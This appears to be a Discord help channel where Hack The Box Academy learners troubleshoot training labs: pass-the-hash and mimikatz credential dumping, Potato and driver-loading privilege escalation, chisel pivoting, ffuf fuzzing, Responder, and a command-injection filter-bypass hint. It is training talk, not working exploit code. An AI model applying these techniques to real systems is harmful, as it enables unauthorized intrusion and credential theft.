#modules
When I connected via RDP using PTH.....it worked...however after lsass dumping and running cmd as david via mimikatz using PTH..I tried to run the tool again but now I get this issue:
```
PS C:\tools> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public
===============================================================
INVOKE-HUNTSMBSHARES
===============================================================
This function automates the following tasks:
o Determine current computer's domain
o Enumerate domain computers
o Check if computers respond to ping requests
o Filter for computers that have TCP 445 open and accessible
o Enumerate SMB shares
o Enumerate SMB share permissions
o Identify shares with potentially excessive privileges
o Identify shares that provide read or write access
o Identify shares thare are high risk
o Identify common share owners, names, & directory listings
o Generate last written & last accessed timelines
o Generate html summary report and detailed csv files
Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
---------------------------------------------------------------
[*][08/10/2025 12:06] Scan Start
[*][08/10/2025 12:06] Output Directory: c:\Users\Public\SmbShareHunt-08102025120634
[*][08/10/2025 12:06] There appears to have been an error connecting to the domain controller.
[*][08/10/2025 12:06] Aborting.
```
i wouldn't concern myself with discovering the shares since they're told to you ¯_(ツ)_/¯
well I am preparing for the exam...so you know doing this for CPTS
@rustic kestrel don't dm people without asking permission for
there's plenty of other opportunities for stuff like that; like with AEN
I see.. i was just playing around.....possibly learning assuming the problems I could face...its working😂
I am treating AEN as a blind mini exam...so preparing my best beforehand
Alr mb
Just wanted to know bout that mentoring u had in ur description
ah then say that next time in the message 😅 i treat the generic wave sticker as just a "hello" and ignore 99% of them
Press enter
It's freerdp not drawing the AUP screen
"By signing in you agree" corporate windows stuff
ohh
I think if you readjust the screen size (if you set /dynamic-resolution)
It fixes it
yeah enter worked
thanks
Can someone who has completed Windows Privilege Escalation Skills Assessment - Part I / Q3: Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop. Please tips if possible?
Is it possible to make certain certificates in htb?
Hi Chat, I just solved both questions of the Understanding Log Sources & Investigating with Splunk - Skills Assessment, but i do not get how the author expected us to solve the second question: Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the process that started the infection. Answer format: _.exe - was i supposed to find the flag with a SPL search or was the flag really just based on understanding the first question of the skills assessment ? I unfortunately found the flag thanks to a writeup but it did not explain how it got the answer. Like some reddit user mentioned, i expected the flag to be whatever program started the answer of the first question.
Using CrackMapExec Module
Final Skill Assessment
Q2: Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I've tried re-enumerating with my new creds A*** but I can't find anything? Could I DM someone here who's completed this?
Spend some time enumerating shares every time you get a set of credentials.
Enumerate privileges and check the module for related content. Now if you are trying to abuse a specific privilege and what is shown in the specific section isn't working, you can DM.
Thanks for the response. I'll try again, maybe I missed something.
Try some things from the spidering section.
Will do. Thanks for the nudge!
Hey guys, anybody did the LLM output attacks module? I need help in the skill assessment.
Good afternoon, I need help...
Module: Linux Privilege Escalation
Section: Logrotate
Objective: Escalate privileges and gain root
Problem: I can't make the logrotten exploit work. I have identified the file with cat /var/lib/logrotate.status and compiled the code on the target system. I have tried running the exploit a few times and performed multiple resets on the target. I searched on google and also tried searching for a solution on this channel's history.
How can I make it work? Do I need to edit the exploit code?
instead of trying to get a shell, try moving the file
Having enabled SeImpersonate and SeAssignPrimaryToken, I tried JuicyPotato, RoguePotato, and JuicyPotatoNG, but without success. Am I doing something wrong? The privileged process failed to communicate with our COM Server :( Try a different COM port in the -l flag.
Gotcha, go ahead and DM.
hello im having "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)" solutions timedatectl set-ntp 0 to disable time sync + ntpdate/rdate not solving my problem
my link in #cpts was to a specific message
aside from that, vpn region can make a difference sometimes
ahhh many thanks
isn't this step to add the cert ?
Anyone ran into the rdp connection not working at all? Currently working on file transfers but cant remote into the linux box
ive tried my own machine with multiple vpn locations at different times of day, as well as the pwnbox
the exploit works by coercing the server to give you a valid cert
is rdp the method they tell you to use for the linux machine; what section? what error are you receiving?
yes
oh god
Im going to bash my head in with a pan
it said ssh for linux, rdp for windows
(╯°□°)╯︵ ┻━┻
i was about to reply with the John Cena Gif
layer 8 issue bois, thank you @fathom pendant
listen, reading is hard as a hacker. We traded literacy for tech skills... and even then i don't think i even have that 🥀
yea thing is im leaving my cushy and easy it audit/consultancy for the infinite pain that is technical security
Its so much more fun and fulfilling, but ive never ever felt more incompetent, save for my Msc thesis
I am doing the Cracking Passwords with Hashcat module, but I am getting stuck cracking the common password page. I am cracking 7106812752615cdfe427e01b98cd4083 which (through hashid) gives me:
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
ofc I am not going to try all of these so I am trying the low-hanging ones like MD5 and NTLM but no luck so far. I am trying different default rulesets but esp if I have to hybrid this out I'll be running these for like hours and I think I am missing something
Any ideas/hints?
I am using the rockyou dataset as instructed, following the exercise and the hint but no luck yet:
the exercise is this:
Crack the following hash: 7106812752615cdfe427e01b98cd4083
And the hint says the following:
Use hashid to identify the hash, and then use one of the Hashcat built-in rule sets or hybrid mode to help you crack it.
I understand it might be a bit long of a message but I've been stuck on this for very long and idk what I'm supposed to be doing here, so if there's a hashcat pro in here it would be very much appreciated!
Hey guys, I'm trying to perform the "CVE-2020-0668" exploit, both locally and using the PwnBox with different US VPN, and I get the same result. Has anyone faced this issue?
Module: "Kernel Exploits" - Windows PrivEsc
Did you figure it out, I also tried spraying and brute forcing and can’t find anything :/ help lol!
Read the password policy document on the desktop carefully. It gives you a hint as to what the custom password list is supposed to look like.
That’s what I did I grepped rock you and filtered with what the pdf said :/
It also tells you the default password format
try typing "shell"
i generally dislike using the integrated terminal though
Already tried, not working
it's very clunky and i've seen it kinda fail out and freeze more than it's helped
you're better off just running the pwnbox in fullscreen and going through it
I believe the issue was the msf db connection was broken
Thanks for responding. I edited the payload to move the flag with mv flag.txt /home/htb-student/ and mv /root/flag.txt /home/htb-student/. The exploit runs completely, but I am unable to read the flag. It just renames backup to backup2 and creates an mlink to /etc/bash_completion.d. The folder disappears shortly after that, but there is no flag.
I have been trying to make this work for hours, thinking I will get it if I just try again... I appreciate your help. It would be great if you can give me another hint, otherwise I will just move on and try some other time.
well; moving might not have been the right verbiage.
Hey guys, I need help:
Module: Shells and Payloads
Section: Live Engagement
Objective: Exploit the target and gain a shell session
Problem: I'm logging into the foothold host and know that I need to go to the given IP to find a way to upload the payload I created. My issue is that the foothold host doesn't have a web browser, so I can't search up the IP through that, and if I try to search it up through the attack box it won't work. I did curl on the foothold host and it worked, but I don't know what next step to take from here
Any advice?
Open it using the terminal.
firefox in terminal
:)
i do agree though there should be a desktop icon
I feel dumb 😭 thank you guys
(speaking of desktop, there's an important file there)
hello i am currently on the footprinting module and i am at the part for smb and i need to find the domain can someone maybe give me a hint to what domain is because it isn't really clear to me ?
(alternatively you can learn how to use a pivoting tool and say "screw the foothold"
so with windows AD environments you're typically logging in as domain\user i.e. corporate.local\bob. I believe the Script scan for smb can find out some stuff, but there's stuff you can do with RPC to enumerate
oh okay so i should learn active directory ?
also i am using rpcclient to enumdomain But i don't understand the output i am getting haha sorry
i am in the beginning of the pentester path so i am still very new to this XD
i am also pretty sure i got the answer but it keeps saying i am wrong haha
ah okay but i do have a answer with rpcclient
but it says it is wrong
so it confuses the hell out of me haha
how to hack
module name:Pivoting, Tunneling, and Port Forwarding
section name: SOCKS5 Tunneling with Chisel
Question: Unable to run Chisel on the pivot host (ubuntu) because it has a different version of Go than the one it was compiled with
Statically compile it or use an older version
is it possible to link to an example or instructions how to do that? Thank you
thank you in spanish
You go to the github for chisel, releases section, and download an older version and use it. i used 1.7.4. https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz
hey i am still at the footprinting samba module i am stuck at the question about finding additional information and the one where i have to find the system path ?
any tips ?
Rpc is useful where smbclient falls short
okay thank you i will test some other stuff out then
do i connect on the specific share with rpc or just the ip ?
What does the reading tell you
just the ip but it feels like i am missing something haha that is why i asked
I believe they give you all the relevant commands
oh sorry for bothering i see it now XD
thank you for the help
In the AD Enumeration and Attacks skill assessment II, for question 8, I was able to get an Administrator NTLM hash using mimikatz, but that hash did not work to gain access to MSO1. Has anyone found an alternate way?
Was it a local admin hash from a different host?
yeap, indeed
Then the only way it would work on another host is if the local admin password was being reused across hosts.
Alright, TY! I’ll try something else.
If you have low level user access to MS01, I would do some simple enumeration that makes sense with what you are trying to accomplish or go through your mimikatz results from the other host and pass around identified credentials to see if any of them provide new access to anything.
as a note nxc is a good spraying tool; you can pass a list of hosts to it to check against
nxc <protocol> host (or host list file) [options]
i learned it when i was redoing the updated password attacks module
And the best way to check that would be to use nxc, right?
yep
you can create a host list like
DC01
MS01
File01
(or use the ips instead, the fqdn/name approach requires you to have it in your hosts file)
then the syntax i stated above
I am coding a file that decodes chess games and finds the most viable and most common move
i am having trouble lol
when i input to power shell python lichess_move_aggregator.py --input lichess_db_standard_rated_2013-01.pgn --outdir results it cannot find the file even though i have it downloaded
the file name matches
what academy module does this have to do with?
if it has nothing to do with an academy module: read and follow #welcome and ask in #programming 😉
This kind of project — analyzing millions of chess games programmatically — relates mostly to the Data Science and Computer Science modules in an academy setting,
it has nothing to do with HTB academy (https://academy.hackthebox.com)
sorry lol
And I think nxc has an option to generate host list and then we can copy it in our hosts file
that i don't know, but maybe
it looks like it uses an ip list to generate the hosts file
Can someone help, not sure why results aren't coming back..
errors
are u scanning for vhosts here?
with ffuf and htb targets in general you use -u http://ip:port -H "host: FUZZ.academy.htb"
this is because .htb isn't a routed subdomain
also: the /etc/hosts file should never contain the port
thanks, it worked
Hi, I have a question related to the NETWORK ENUMERATION WITH NMAP module, specifically in the Host and Port Scanning section under Filtered Ports.
It mentions that a port is considered filtered when packets are rejected or dropped However, in the scan output, I see an ICMP error message with type=3/code=3 (port unreachable), and the port is marked as filtered.
Later in another module, I see the same ICMP error (type=3/code=3), but the port status is shown as closed instead of filtered.
Why does the same ICMP error code sometimes indicate a filtered port and other times a closed port? What causes this difference in interpretation?
#1234357888114364508 if you believe this to be an error
ah dug into the manual pages
the first one appears to be a Syn scan so code3/type3 -- filtered, where the second is udp, where code3/type3 returns closed
yes sir
this is not an error in the content. It's explained in the docs for nmap
I will check sir thank you
also, don't call me sir
yes, and can even provide the whole subnet in CIDR notation as well
Hi, I was trying to upgrade tty but when trying to exit I am stuck here, I cannot exit it without killing the process is there any other way out, I learnt it from getting started
Can anyone teach me cyber security i got little to no experience in this domain
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I only know how to do osint
I gave you the link to get started
@grizzled trellis #cwes message ; you'll need to utilize ffuf's filters
ok!
i believe the relevant ones are explained in the section
To add to this, you'll want to make sure you're using the command shown in the section. Your command is missing a lot of syntax.
Does anyone know how to solve the Parameter Fuzzing - GET in Attacking Web Applications with Ffuf?
The results of ffuf -u "http://94.237.49.23:41533/?FUZZ=test" -w burp-parameter-names.txt are all [Status: 200, Size: 986, Words: 423, Lines: 56, Duration: 250ms]
Read above. Fix your command syntax and use the command shown in the section. Replace xxx with the response size to filter out the same ones.
filter out 986 but no output
im sorry, im so confused lol. im trying to get into this but i dont fully understand it..
You need to connect your HTB account by following the instructions in #welcome.
Make sure to fix your syntax as well, the values in your parameters were off.
Isn't it ffuf -u "http://94.237.49.23:41533/?FUZZ=test" -w burp-parameter-names.txt -fs 986?
nope
review the command shown
actually that should work though
as long as the txt file is in your cwd
it is off though, you are using test as the value
not sure if that makes a difference here
Burp-parameter-names.txt is in the same folder. Can't I use test as the value?
idk i didn't try it, i did what the module showed
Try using a different reverse shell
Hey guys it seems like yall are helping with another module but i would love to know the answer to one of these modules. https://academy.hackthebox.com/module/312/section/3724
No one's going to straight up give you the answer, best to say which module/section/question you're on and what you need help with
I'm trying this now doesn't seem to work for me either
I am capturing the correct AP and all but it says I dont have and am missing EAPOL frames when I try to capture the handshake. I’ve tried deauthing (both broadcast and targeted) and locking onto the channel/BSSID, but still can’t get a valid capture
i think there's some thing with hashcat and pcap/pcapng
if it's what i think others have talked about here
i see. I just wanted to make sure I wasnt doing anything wrong. Im sort of new but I put so much time into this one I have a pretty good understanding now
But if it helps i can share the module and stuff if that link i sent didnt work
it shouldn't matter btw; as you're fuzzing for a valid parameter you're waiting for the size to change due to "invalid parameter" or some such message that would change the length
i haven't done that module nor do i have it unlocked, that's why i'm unsure
i figured out the issue
@royal jetty You're using the IP in your command. I don't think the page responds to that.
ah... vhosts are important
@fathom pendant what are the things you heard about hashcat and pcap?
just that for whatever reasons it doesn't like the format so you gotta use a tool like hcxpcapngtool
I tried that even and I think it was saying I didnt have enough frames. Weird 🤦♂️
you have to use the same URL as shown in the module but obviously you have to change the IP and port in your /etc/hosts file
http://admin.academy.htb:PORT/admin/admin.php
ffuf -w burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:57771/admin/admin.php?FUZZ=key
Progress: [6453/6453] :: Job [1/1] :: 621 req/sec :: Duration: [0:00:10] :: Errors: 6453 :::
No output
Did the client reconnect after disconnecting? You can recognize this when EAPOL is displayed in the output.
This is explained in the module in the section “The Traditional WPA Password Attack.”
You mean after i sent the deauth right? if so then yes I mean it said EAPOL which let me know SOMETHING got saved. And like there is even a WPA 2 hash when i broke down the file
its mainly when I tried to either use aircrack immediately or transfer into to something hashcat can read i get that i dont have enough frames
I was hoping it was a HTB error but this is why i resulted here 🙂
That's because you have a lot of errors. You need to add the host to your hosts file.
You can check your capture with Cowpatty
said there was no such command as cowpatty in my rdp host
cowpatty -c -r yourfile-01.cap
ffuf -u "http://94.237.49.23:41533?FUZZ=test" -w burp-parameter-names.txt -H "Host: 94-237-49-23.uk-lon1.upcloud.host"?
When you're running airodump-ng and deauth a target, you'll see the handshake in the upper right of the airodump-ng command. that's how you know you've captured the handshake.
No, use the command you did before, but add the vhost to your hosts file.
yes I was able to see my bssid. Because im on a macbook (soon to buy a pc lol) it was kinda cut off so i could only see 02:0
but still confident that i captured traffic
It doesn't matter what you're working with. Either way, you have to connect to the HTB machine, and that's the only place you can start capturing.
of course. And yes I did rdp into the machines IP using remmina
You should be able to change resolution and see when the hash is captured
handshake*
change resolution?
you said it was cut off so you couldn't see everything
i imagine it's because of low resolution or something
you should be able to see the entire output
I wish i could send screen shots lol but on the left side of remminas UI there was a way to make it scaled and I did that. I will try again rn to make sure tho that im seeing the full output
read and follow #welcome
take care not to post content from modules above tier 0
I've modified C:\Windows\System32\drivers\etc\hosts to add 94.237.48.12 and 94-237-48-12.uk-lon1.upcloud.host. However, when I run ffuf -u "http://94-237-48-12.uk-lon1.upcloud.host:57771/?FUZZ=test" -w burp-parameter-names.txt -fs 986
:: Progress: [6453/6453] :: Job [1/1] :: 162 req/sec :: Duration: [0:00:43] :: Errors: 0 ::
Ultimately, nothing happens.
You probably need to modify the hosts file on your VM/pwnbox, not your Windows machine
and that is not the right hostname, like i said, use the one you used previously to that
use the command given in the module, the only modifications you need to make is maybe the path to the wordlist and the size you're filtering out
use the host shown in the module/command
What must i block out exactly?
we don't need the screenshot tbh. but you'd have to block out content from the module.
if your capture file doesn't contain the handshake, you won't get the hash. simple as that.
sheesh alright..
does your airomon-ng output show the handshake captured like i highlighted for you?
sure do
1) Change the /etc/hosts file on your VM/Pwnbox, not Windows. 2) Use the hostname they provided in the example.
Okay you got it. Now crack it, or use a tool to convert it to a format hashcat can use if you want to use hashcat.
my next issue when i try to convert the cap file
did it output a hash in the hash file?
if not maybe try restarting the target or changing servers/regions
yes and hmmm changing servers/regions is something I havent tried yet.
help upload
Hey! who could nudge me DACL II 2nd task?
I can modify logon script of a user who can link GPO but it seems he doesn't access it. Is this a bug or did I miss something?
FYI, the Attacking FTP module took me multiple attempts to work and spawn an FTP service on the target. I waited more than 60 seconds every time, might be useful to look into it
@tawny palm ?
There is an example command in the Sliver module
upload http-beacon.exe C:/temp/http-beacon.exe
Within the commands and tools introduction section, it showcases the usage of the upload command as so
could someone please help me with this section of the module?
https://academy.hackthebox.com/module/109/section/1036
I have just tested the command, and it is working as expected
I have a Pixel 8A Graphene OS Phone. I Want to make it an Anonymity phone. I Want to make it a Safe phone. I Need to make it an Anonymity phone. I Want to make it a Privacy friendly phone. I Want to make it a Hardened phone. I Need to make it an Anonymity phone. I Want to make it a Safe phone.
You give me advice yes?
My phone is a Pixel 8A Graphene OS Phone. I Want to make it an Anonymity phone. I Need to make it a Hardened phone. I Want to make it a Safe phone..i Need to make it an Anonymity phone. I Want to make it a Safe phone. I Need to make jt a hardened phone. You give me advice yes?
@surreal rain
Hello, Im new here please someone should help…
I have been trying to access my HTB terminal browser for some days now but it’s showing Connection time out..
the cloud VM (pwn box) or target box?
@soft moon
What do i Do?
ok 1st of all why you ping the mods, second of I dont know you and so bold of you to assume I provide him to potentially suspicious activities, whether or not its used alongside malicious actives is 1 thing but why did you post this twice?
Hello hope you are doing well a kind request any who has questions and answers for https://www.examtopics.com/exams/comptia/pt0-002/
https://www.itexams.com/exam/PT0-002 ....downloaded in the pdf file..🙏 🙏 Please any one who has them i need you help. Am getting ready for an exam in few days
This has nothing to do with the Academy. Please read the #rules and don't just ping random people.
cant pdf come with payloads embedded into them?
man people really struggling to not read the rules
try to study the material or use the brain is bad enough an AI could probably give what you seek
The first command fails as there isn't such a path on your system - /home/kali/HTB/Sliver/c:\temp\http-beacon.exe
The second command doesn't have the file name in the remote path
The third command is not escaping the backslash
The fourth command is missing the file name in the remote path
Please use the command that I mentioned:
upload http-beacon.exe C:/temp/http-beacon.exe
Ensure that the temp directory has been created (or present) in C:\
I figured it out was using O instead of 0
so of course it wont display anything very interesting that ip=127.0.0.1%Oals
soft locks burpsuite and never displays
@rustic sage this is not relevant to this server
hahahaha a staff / moderator is watching cant you understand hahahahaaha
Several of them actually
I have a feeling its some criminal trying to get free info lmfao goes to show some dumb rocks
actually no thats rude to rocks because rocks what got us computers xD
How do we run Responder for LLMNR Poisoning if we have a pivot host...and we cannot use Proxychains as it is only for TCP Traffic and we are talking about UDP...and Pivot does not have internet connection? and ...we are on linux pivot...if it was windows I know we could've used inveigh?
Hi
Hi everyone, I try to share my learning progress via student-ID following the Q&A in the image. But I wanna know where I can find that API. I dont see anything related in the community API (https://documenter.getpostman.com/view/13129365/TVeqbmeq).
https://github.com/Qazeer/OffensivePythonPipeline/tree/main/binaries/Responder
might wanna transfer this pre-built binary, other than that you could try to form an artificial VPN if you have root access using ssh
As far as I know, there is currently no official API documentation. The documentation you posted does not cover the Academy.
does anybody having the trouble with completing the CAPE journey? feels like the labs in modules are not working as they should, its embarrassing, I already reached out to support, just asking here if anyone got the same problem
the labs just broken completely, dont know the reason even why, just wasting few hours on my hopes that it will get sorted one day magically itself. haha, unbearable at this point
So how we can I find the API?. Did we need to have a "third party" account to see this API. It is so weird when saying, we can share the learning process via API but API is still a mystery😆
If I remember correctly, you could store your ID with HackerOne. That way, HackerOne could see your training status.
But as far as I know, the API is not there to share your learning status with the world.
I just checked on hackerone, it have it. So, for now, I will understand that the id only support for some organization/party only.
Can someone help me think ive got a technical issue
im doing CPTS > Password attacks > attacking windows credential manager > "What is the password mcharles uses for OneDrive?"
after struggling on it i looked at a walkthrough where he gets this
Cant add images 😐
he runs cmdkey /list and gets loads, I just get the one.
Hi mate! Are you still stuck here?
I figured it out. Got it to work long back
hi any hint for this section i don't understand what going on its messed up.
https://academy.hackthebox.com/module/67/section/605
problem is i unable to compile that UACMe repo features a comprehensive list of UAC bypasses,
Then, can I ask for your help with 2nd task in dm?
I cant try to help
Did you get connection to the target yet?
yesh i have rdp
Go to the tools directory
they run whoami /priv first SeLoadDriverPrivilege not there then they write something . The UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line.
then they again run same whoami command and SeLoadDriverPrivilege comes.
SeLoadDriverPrivilege Load and unload device drivers Disabled
i want to load this SeLoadDriverPrivilege
ok done , cd c:\tools
go back one directory and list
ok
Show me please
```
PS C:\tools> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
```
PS C:\tools> dir

    Directory: C:\tools

Mode    LastWriteTime       Length  Name
----    -------------       ------  ----
d-----  5/24/2021 3:11 PM           ExploitCapcom
-a----  5/24/2021 3:12 PM   10576   Capcom.sys
-a----  8/11/2025 2:36 AM   155134  drivers.txt
-a----  5/24/2021 3:11 PM   44920   DriverView.exe
-a----  5/24/2021 3:11 PM   119808  EnableSeLoadDriver
-a----  5/24/2021 5:25 PM   15360   EoPLoadDriver.exe
```
Go to that directory and type dir.
Quit with the whoami
whoami 😅 my bad sorry
```
PS C:\tools> .\EoPLoadDriver.exe System\CurrentControlSet\Capcom
Tarlogic Security
Usage: EOPLOADDRIVER.exe RegistryServicePath DriverImagePath
eg: EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Users\Username\Desktop\Driver.sys
```
I'm not sure if it matters but i was using cmd.exe as admin
Look at the section. "Automating the Steps"
You should be able to figure that out.
Any help or hint will be much appreciated, Thankyou
Try using bloodhound and see if you find anything interesting
alrighty thankyou
Hi, I`ve been stuck on Attacking Authentication Skills Assessment, can anyone help on this one>
?
I'm doing Windows Attacks & Defense course, and I can't find the password.txt file anywhere, and I need it for some Hashcatting
Did you manage to progress?
You can DM the output and I can tell you if it is working correctly or not.
i am on Working with IDS/IPS Suricata Rule Development Part 1 unable to connect to the rdp session i tried every xrdp command known to mankind the command loads the sessions rdp screen pops and closes
─(kali㉿kali)-[~]
└─$ xfreerdp /v:10.129.5.52 /u:htb-student /p:'HTB_@cademy_stdnt!' /relax-order-checks /rfx
[07:39:24:143] [35758:00008bb0] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[07:39:24:143] [35758:00008bb0] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: *************************************************
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: This build is using [runtime-check] build options:
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: * 'WITH_VERBOSE_WINPR_ASSERT=ON'
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]:
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: [runtime-check] build options might slow down the application
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: ********************
(kali㉿kali)-[~]
└─$ xfreerdp /u:htb-student /p:'HTB_@cademy_stdnt!' /v:10.129.5.52 /dynamic-resolution /relax-order-checks +glyph-cache
[07:40:40:233] [36465:00008e71] [ERROR][com.winpr.commandline] - [log_error]: Failed at index 6 [+glyph-cache]: Unexpected keyword
FreeRDP - A Free Remote Desktop Protocol Implementation
See www.freerdp.com for more information
also tried
i have also reset the target, not working still. i ping the ip, it's working fine
If it is a provided wordlist, it is likely available for download via a Resources button in the Module. If there is no Resources button, then there are none to download. This screenshot is just an example of what I am talking about. I have not done that Module, so I do not know about the password.txt file.
i just continued now , i uploaded sharphound on it and got the zip on my local machine now gonna bootup bloodhound and see what can i find in there. will update you soon
ps help with my query
Ive messaged you but need to add as friend i think!
Idk why i cant put images here rip
does anyone know the password for bloodhound on the htb instance?
|| neo4j:HTB_@cademy_stdnt! || aint working
It should be neo4j:neo4j
it worked, thankyou @gray yacht
You can dm me 🙂
Only AnDRO, other dm's will be ignored
need help with web requests
HyperText Transfer Protocol (HTTP)
it lets me run the command curl "server_ip"/download.php
but -s -o doesnt work
just says no url specified when i add those
hey can i dm you ?
yes sure
Thankyou soo much for sharing this!
Howdy. I'm doing the Stack Based buffer overflow module. In the "Take Control of EIP" it asks "Examine the Registers and submit the address of EBP as the Answer". I cannot seem to figure out what it's asking for. I've tried the content of the ebp register. I've tried overflowing the buffer to get the offset of ebp and adding that to the esp to get its location on the stack. I just cannot figure out what it's asking for. Pic related
If my subscription ends and I'm in the middle of a module, will I lose my progress in it, or just the access to it?
I'm getting the same, did you find any solution to this?
Looking at a course I have that I was unable to finish before my subscription ended, it still shows the progress bar at the point where I was at, so I assume it will maintain your progress.
progress still there, but lost access if it is in the subscription
Thanks a lot for the explanation, guys!
could I please get some help command injection is quite hard
https://academy.hackthebox.com/module/109/section/1038
from the last section I have a got the users home dir but really brain fried on how to get the cat command to work as it either gives blank output or invalid output 🙁
yes through c'a't$ etc etc
oh really?? didnt come to me but I do some testing
so then by logic oooo im so stupid I might rest I did
c'a't'$ etc etc
yes I saw that when HTB was mentioned in the module somewhere about if a network active occurs in the network tab of inspect
ok thanks I have to re read once I get better sleep I think ive been awake too long
Hello admin, any issue with this lab - Skills Assessment - Using Web Proxies
https://academy.hackthebox.com/module/110/section/1055
I'm getting the same issue both on my local kali and the Parrot pwnbox
Using ZAP:
An exception occurred while attempting to connect to: https://94.237.58.104:51951/lucky.php
The exception was:
Unsupported or unrecognized SSL message
Root cause:
SSLException: Unsupported or unrecognized SSL message
The following document may be of assistance in resolving this failure:
https://www.zaproxy.org/faq/how-to-connect-to-an-https-site-that-reports-a-handshake-failure/
Without ZAP:
This site can’t provide a secure connection
94.237.58.104 sent an invalid response.
Try http not https
https://academy.hackthebox.com/module/77/section/844
I Have no clue how to start this off. Ive read and re-read the module at least 7 times now
Well, the question says to ssh into the machine. Have you done that part?
is that the Sudo user thing?
right thats the problem, whats the port?
it says use the given port but im not seeing the port
you're given ip:port; you don't do ssh user@ip:port
short answer though: remove the :38433 from the user1@ip portion in your command
good luck!
Uhh I can't type now-
Its asking for a password but I cant type
Its not going to show what you type, this is intentional and a security feature of ssh
Sorry asking questions in another section, have anybody submitted walkthrough for a machine, I submitted a walkthrough about 3 days ago, and it still says under review, does it take that long usually
yo guys
im on bleeding edge vulns from AD enum
ive fired up the target, which is the ACADEMY-EA-ATTACK01
im supposed to ssh into it and do exploits on the DC01 on 172.16.5.5
but its offline
i used the scanner scripts for the vulnerabilities and all returned a connection problem
also nmap all ports are filtered
Jerry it is like 2019
does it take more for older machines
also why i do not have permissions for general
yoo thank you so much man i did not know there was this much sections
So, I got to the ID_RSA key looking thing but idk what to do now
Well you can copy and paste it on your system
do i run a vim for ID rsa on a separate command line?
make a new file and copy into that
Can anyone help me on credential hunting in network shares. I only get the hr_b***** username and it's password nothing useful when I use grep -ir "pass"
how do i do that. I think im missing something let me re-read the lesson
which module you are doing?
first cat the id_rsa on the machine you are seeing...then copy content...and in your machine "nano id_rsa" and paste that content you copied from id_rsa
Phh okay thank you!
hi
I pasted it into the nano, anything else??
depends what is your task
you can login into that machine with the private key
"Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'."
basically this task is saying you to become root
do you have password?
of user2?
for User2 i dont but I do for the main user
Hi. I'm struggling with a question "Submit the size of the stack space after overwriting the EIP as the answer. (Format: 0x00000)". I believe the answer should be one of two things. The first is ffffffff - esp register. The other is ffffffff - the address after the eip register. Neither seems correct please help clarify where I'm making wrong assumptions. This is in Stack-Based Buffer Overflows on Linux x86 module section Generating Shellcode
which module
Stack-Based Buffer Overflows on Linux x86 forgot to include that my bad
yo guys
im trying to get gettgtpkinit.py but im having a python problem
oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto
although its already installed system wide
Hello
AD Enum & Attack
Skills Assessment # 2
I start responder on both interfaces, I do not retrieve any Hash....
Both?
You just need to start on the 2nd one on the internal network
Something like esc2
Sudo responder -I <2nd interface name>
Can anyone help me on credential hunting in network shares. I only get the hr_b***** username and it's password nothing useful when I use grep -ir "pass"
Which module
I'm having trouble finding Nicholas's SID. What is the client ID of "Nicholas Taylor"? It's one of the last activities of the pentest in a nutshell module. CJCA
Help, please!
But it doesnt get any hash i left it on for like 1 hour
Have you tried only on interface 2?
Password attacks
Isnt this is the part where they also tell about netexec spidering right?
Yes
I remember a little bit , there is folder or share called tools
Yeah I tried to do it by Linux
You need to manually explore all these things
Used manspider
Nothing worked for me i guess
Yeah I did in windows too
Netexec was giving error
But all I see is a html report and some .CSV files
You got some credentials?
Yeah I got the same but then it worked from my own attack box
No
But the actual data is not in that
I will open in mobile
You can dm me
Guys, who can help me with DACL II SA 2nd question?
I believe the target user has to trigger his logon script but he hasn't. What I do wrong?
Hello all! sorry for all the questions. Im working on the Citrix breakout section. Im trying to import PowerUp.ps1 but getting a powershell error and cant set the execution policy. any ideas?
Doing the Medium foot printing end of module lab. I am getting a permission denied error every time I try to cd into the folder that I mounted with the nfs share. I have tried this in my own VM and in their in built lab. It says that the permissions for the folder are for nobody and nogroup which should make everyone use the same anonymous account? I could literally list the contents with the rpcinfo nmap script. What is going on?
Never mind. I got it. NGL when I found out what you actually had to do, it kind of pissed me off. I literally tried to modify my personal groups and UIDs and GIDs because of the authentication and authorization bit in the actual lesson. Then enumerated every single other service to no avail. Feels very gimmicky and like a gotcha. How can I prepare myself for something like that on the actual exam? I wouldn't have even come close to considering that as even a possibility.
found the answer, had to start powershell a different way
Take a deep breath and work methodically, always try the simple solutions
